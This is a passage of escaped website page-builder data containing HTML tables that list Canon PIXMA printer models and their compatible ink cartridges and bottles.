width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 